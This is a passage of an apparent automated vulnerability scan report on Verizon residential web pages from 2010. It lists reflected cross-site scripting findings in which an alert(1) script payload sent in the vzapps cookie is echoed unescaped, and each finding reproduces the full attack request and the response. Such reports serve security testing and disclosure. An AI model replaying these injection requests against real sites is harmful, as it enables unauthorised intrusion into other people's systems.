Cookie: Source=CHSI; vzapps=STATE=TXb8b99'><script>alert(1)</script>47fb54bb178; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69367
Expires: Sat, 20 Nov 2010 00:13:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/
Set-Cookie: ContextInfo_State=TXb8b99'><script>alert(1)</script>47fb54bb178; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:45 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB8B99'><SCRIPT>ALERT(1)</SCRIPT>47FB54BB178 ' />
...[SNIP]...

1.44. http://www22.verizon.com/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload ab07d<script>alert(1)</script>4c69398d6d5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXab07d<script>alert(1)</script>4c69398d6d5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69363
Expires: Sat, 20 Nov 2010 00:14:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:22 GMT; path=/
Set-Cookie: ContextInfo_State=TXab07d<script>alert(1)</script>4c69398d6d5; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:22 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:22 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:22 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXAB07D<SCRIPT>ALERT(1)</SCRIPT>4C69398D6D5 </DIV>
...[SNIP]...

1.45. http://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f710f'><script>alert(1)</script>e2fd98d03b8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXf710f'><script>alert(1)</script>e2fd98d03b8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57182
Expires: Sat, 20 Nov 2010 00:09:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:46 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf710f'><script>alert(1)</script>e2fd98d03b8; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FiOS Internet | Check Availability
</title><meta name="keywords" content="fios internet check availability, fios availability, fios check
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF710F'><SCRIPT>ALERT(1)</SCRIPT>E2FD98D03B8 ' />
...[SNIP]...

1.46. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 72540<script>alert(1)</script>7d82b6fd3cc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX72540<script>alert(1)</script>7d82b6fd3cc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69784
Expires: Sat, 20 Nov 2010 00:12:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:20 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:20 GMT; path=/
Set-Cookie: ContextInfo_State=TX72540<script>alert(1)</script>7d82b6fd3cc; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:20 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX72540<SCRIPT>ALERT(1)</SCRIPT>7D82B6FD3CC </DIV>
...[SNIP]...

1.47. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 217f0'><script>alert(1)</script>c757f2d9905 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX217f0'><script>alert(1)</script>c757f2d9905; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69788
Expires: Sat, 20 Nov 2010 00:12:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:10 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX217f0'><script>alert(1)</script>c757f2d9905; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX217F0'><SCRIPT>ALERT(1)</SCRIPT>C757F2D9905 ' />
...[SNIP]...

1.48. http://www22.verizon.com/Residential/FiOSInternet/FAQ/FAQ.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8f35d<script>alert(1)</script>666a41a49d0 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8f35d<script>alert(1)</script>666a41a49d0; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 114983
Expires: Sat, 20 Nov 2010 00:10:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:57 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8f35d<script>alert(1)</script>666a41a49d0; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FiOS Internet: FAQs
</title><meta name="keywords" content="FiOS Internet FAQs, fios faqs, verizon fios faqs, fios details, fios informatio
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8F35D<SCRIPT>ALERT(1)</SCRIPT>666A41A49D0 </DIV>
...[SNIP]...

1.49. http://www22.verizon.com/Residential/FiOSInternet/FAQ/FAQ.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 77bd6'><script>alert(1)</script>866fecce315 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX77bd6'><script>alert(1)</script>866fecce315; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 113390
Expires: Sat, 20 Nov 2010 00:09:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX77bd6'><script>alert(1)</script>866fecce315; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FiOS Internet: FAQs
</title><meta name="keywords" content="FiOS Internet FAQs, fios faqs, verizon fios faqs, fios details, fios informatio
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX77BD6'><SCRIPT>ALERT(1)</SCRIPT>866FECCE315 ' />
...[SNIP]...

1.50. http://www22.verizon.com/Residential/FiOSInternet/Features/Features.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78bda'><script>alert(1)</script>c540e06163e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX78bda'><script>alert(1)</script>c540e06163e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75663
Expires: Sat, 20 Nov 2010 00:11:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:57 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/
Set-Cookie: ContextInfo_State=TX78bda'><script>alert(1)</script>c540e06163e; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

<script type="text/javasc
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX78BDA'><SCRIPT>ALERT(1)</SCRIPT>C540E06163E ' />
...[SNIP]...

1.51. http://www22.verizon.com/Residential/FiOSInternet/Features/Features.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6e62f<script>alert(1)</script>a74e7065845 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX6e62f<script>alert(1)</script>a74e7065845; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75659
Expires: Sat, 20 Nov 2010 00:12:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:09 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:08 GMT; path=/
Set-Cookie: ContextInfo_State=TX6e62f<script>alert(1)</script>a74e7065845; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:08 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:08 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:08 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

<script type="text/javasc
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX6E62F<SCRIPT>ALERT(1)</SCRIPT>A74E7065845 </DIV>
...[SNIP]...

1.52. http://www22.verizon.com/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e17ad'><script>alert(1)</script>33b4d098683 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe17ad'><script>alert(1)</script>33b4d098683; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119104
Expires: Sat, 20 Nov 2010 00:14:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:04 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/
Set-Cookie: ContextInfo_State=TXe17ad'><script>alert(1)</script>33b4d098683; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE17AD'><SCRIPT>ALERT(1)</SCRIPT>33B4D098683 ' />
...[SNIP]...

1.53. http://www22.verizon.com/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload af6d8<script>alert(1)</script>b1212cf33ee was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXaf6d8<script>alert(1)</script>b1212cf33ee; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119100
Expires: Sat, 20 Nov 2010 00:14:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:16 GMT; path=/
Set-Cookie: ContextInfo_State=TXaf6d8<script>alert(1)</script>b1212cf33ee; path=/
